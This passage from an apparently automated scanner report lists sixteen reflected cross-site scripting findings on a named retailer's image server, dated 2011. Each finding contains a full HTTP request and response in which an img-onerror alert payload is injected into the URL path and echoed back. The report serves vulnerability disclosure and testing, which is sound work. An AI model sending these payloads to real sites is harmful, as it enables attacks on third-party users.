The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0add<img%20src%3da%20onerror%3dalert(1)>3a458bffe10 was submitted in the REST URL parameter 4. This input was echoed as c0add<img src=a onerror=alert(1)>3a458bffe10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo015c0add<img%20src%3da%20onerror%3dalert(1)>3a458bffe10?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/brand_logo015c0add<img src=a onerror=alert(1)>3a458bffe10

3.39. http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo016

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eddcd<img%20src%3da%20onerror%3dalert(1)>36a4f7cabf5 was submitted in the REST URL parameter 4. This input was echoed as eddcd<img src=a onerror=alert(1)>36a4f7cabf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo016eddcd<img%20src%3da%20onerror%3dalert(1)>36a4f7cabf5?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/brand_logo016eddcd<img src=a onerror=alert(1)>36a4f7cabf5

3.40. http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo017

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7c78<img%20src%3da%20onerror%3dalert(1)>f21d66732f0 was submitted in the REST URL parameter 4. This input was echoed as d7c78<img src=a onerror=alert(1)>f21d66732f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo017d7c78<img%20src%3da%20onerror%3dalert(1)>f21d66732f0?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/brand_logo017d7c78<img src=a onerror=alert(1)>f21d66732f0

3.41. http://images3.pacsun.com/is/image/pacsun/brand_logo037 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo037

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2d290<img%20src%3da%20onerror%3dalert(1)>5ddd19d0da2 was submitted in the REST URL parameter 4. This input was echoed as 2d290<img src=a onerror=alert(1)>5ddd19d0da2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo0372d290<img%20src%3da%20onerror%3dalert(1)>5ddd19d0da2?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/brand_logo0372d290<img src=a onerror=alert(1)>5ddd19d0da2

3.42. http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btnASmallV3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1998<img%20src%3da%20onerror%3dalert(1)>528b4e0b9e5 was submitted in the REST URL parameter 4. This input was echoed as d1998<img src=a onerror=alert(1)>528b4e0b9e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btnASmallV3d1998<img%20src%3da%20onerror%3dalert(1)>528b4e0b9e5?$img_gif$&$txt=GET+PACMAIL&$layer_0_src=PacSunV2%2Fbtn_130x28&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 78
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:09 GMT
Connection: close

Unable to find /pacsun/btnASmallV3d1998<img src=a onerror=alert(1)>528b4e0b9e5

3.43. http://images3.pacsun.com/is/image/pacsun/btn_myBag_v3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_myBag_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 474f1<img%20src%3da%20onerror%3dalert(1)>5ce3405dd8e was submitted in the REST URL parameter 4. This input was echoed as 474f1<img src=a onerror=alert(1)>5ce3405dd8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_myBag_v3474f1<img%20src%3da%20onerror%3dalert(1)>5ce3405dd8e?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 79
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/btn_myBag_v3474f1<img src=a onerror=alert(1)>5ce3405dd8e

3.44. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_searchGo_v2

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5728<img%20src%3da%20onerror%3dalert(1)>b0a30417ea6 was submitted in the REST URL parameter 4. This input was echoed as d5728<img src=a onerror=alert(1)>b0a30417ea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_searchGo_v2d5728<img%20src%3da%20onerror%3dalert(1)>b0a30417ea6?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v2d5728<img src=a onerror=alert(1)>b0a30417ea6

3.45. http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/btn_searchGo_v3

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a76eb<img%20src%3da%20onerror%3dalert(1)>4c782d0a103 was submitted in the REST URL parameter 4. This input was echoed as a76eb<img src=a onerror=alert(1)>4c782d0a103 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/btn_searchGo_v3a76eb<img%20src%3da%20onerror%3dalert(1)>4c782d0a103?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/btn_searchGo_v3a76eb<img src=a onerror=alert(1)>4c782d0a103

3.46. http://images3.pacsun.com/is/image/pacsun/denimMega_071311 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/denimMega_071311

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 289bb<img%20src%3da%20onerror%3dalert(1)>26baf769630 was submitted in the REST URL parameter 4. This input was echoed as 289bb<img src=a onerror=alert(1)>26baf769630 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/denimMega_071311289bb<img%20src%3da%20onerror%3dalert(1)>26baf769630?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/denimMega_071311289bb<img src=a onerror=alert(1)>26baf769630

3.47. http://images3.pacsun.com/is/image/pacsun/detailLogo_011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de255<img%20src%3da%20onerror%3dalert(1)>c346dbd6552 was submitted in the REST URL parameter 4. This input was echoed as de255<img src=a onerror=alert(1)>c346dbd6552 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_011de255<img%20src%3da%20onerror%3dalert(1)>c346dbd6552?$img_gif$&hei=20&wid=93&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_011de255<img src=a onerror=alert(1)>c346dbd6552

3.48. http://images3.pacsun.com/is/image/pacsun/detailLogo_071 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_071

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c283f<img%20src%3da%20onerror%3dalert(1)>36eb41daa77 was submitted in the REST URL parameter 4. This input was echoed as c283f<img src=a onerror=alert(1)>36eb41daa77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_071c283f<img%20src%3da%20onerror%3dalert(1)>36eb41daa77?$img_gif$&hei=20&wid=90&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_071c283f<img src=a onerror=alert(1)>36eb41daa77

3.49. http://images3.pacsun.com/is/image/pacsun/detailLogo_101 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_101

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c6ee0<img%20src%3da%20onerror%3dalert(1)>eee01c75e51 was submitted in the REST URL parameter 4. This input was echoed as c6ee0<img src=a onerror=alert(1)>eee01c75e51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_101c6ee0<img%20src%3da%20onerror%3dalert(1)>eee01c75e51?$img_gif$&hei=20&wid=112&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_101c6ee0<img src=a onerror=alert(1)>eee01c75e51

3.50. http://images3.pacsun.com/is/image/pacsun/detailLogo_161 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_161

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42fb2<img%20src%3da%20onerror%3dalert(1)>9bfa309cd73 was submitted in the REST URL parameter 4. This input was echoed as 42fb2<img src=a onerror=alert(1)>9bfa309cd73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_16142fb2<img%20src%3da%20onerror%3dalert(1)>9bfa309cd73?$img_gif$&hei=20&wid=77&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:36 GMT
Connection: close

Unable to find /pacsun/detailLogo_16142fb2<img src=a onerror=alert(1)>9bfa309cd73

3.51. http://images3.pacsun.com/is/image/pacsun/detailLogo_181 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_181

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5af61<img%20src%3da%20onerror%3dalert(1)>de04cd3978d was submitted in the REST URL parameter 4. This input was echoed as 5af61<img src=a onerror=alert(1)>de04cd3978d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_1815af61<img%20src%3da%20onerror%3dalert(1)>de04cd3978d?$img_gif$&hei=20&wid=58&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:28 GMT
Connection: close

Unable to find /pacsun/detailLogo_1815af61<img src=a onerror=alert(1)>de04cd3978d

3.52. http://images3.pacsun.com/is/image/pacsun/detailLogo_202 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_202

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89278<img%20src%3da%20onerror%3dalert(1)>7f5a74568ac was submitted in the REST URL parameter 4. This input was echoed as 89278<img src=a onerror=alert(1)>7f5a74568ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_20289278<img%20src%3da%20onerror%3dalert(1)>7f5a74568ac?$img_gif$&hei=20&wid=93&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:27 GMT
Connection: close

Unable to find /pacsun/detailLogo_20289278<img src=a onerror=alert(1)>7f5a74568ac

3.53. http://images3.pacsun.com/is/image/pacsun/detailLogo_231 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_231

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5edba<img%20src%3da%20onerror%3dalert(1)>ef68be70d54 was submitted in the REST URL parameter 4. This input was echoed as 5edba<img src=a onerror=alert(1)>ef68be70d54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2315edba<img%20src%3da%20onerror%3dalert(1)>ef68be70d54?$img_gif$&hei=20&wid=56&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:41 GMT
Connection: close

Unable to find /pacsun/detailLogo_2315edba<img src=a onerror=alert(1)>ef68be70d54

3.54. http://images3.pacsun.com/is/image/pacsun/detailLogo_242 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_242

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3981c<img%20src%3da%20onerror%3dalert(1)>f3c6a27bcdf was submitted in the REST URL parameter 4. This input was echoed as 3981c<img src=a onerror=alert(1)>f3c6a27bcdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_2423981c<img%20src%3da%20onerror%3dalert(1)>f3c6a27bcdf?$img_gif$&hei=20&wid=32&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:21 GMT
Connection: close

